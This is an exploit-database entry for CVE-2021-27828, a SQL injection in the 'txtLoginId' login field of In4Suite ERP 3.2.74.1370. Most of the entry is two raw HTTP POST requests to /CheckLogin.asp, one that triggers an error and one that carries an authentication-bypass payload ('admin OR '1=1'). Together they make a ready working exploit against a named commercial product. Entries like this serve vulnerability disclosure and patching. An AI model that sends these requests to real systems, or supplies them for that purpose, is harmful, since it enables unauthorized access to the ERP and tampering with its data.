[] NeoSense
E X P L O I T S
title author type platform port cve id

In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection

Author: Gulab Mondal
type: webapps
platform: multiple
port: 
date_added: 2021-05-19 
date_updated: 2021-06-03 
verified: 0 
codes: CVE-2021-27828 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828

-----------------------------------------

SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.

--------------


# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="

------------------------------
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.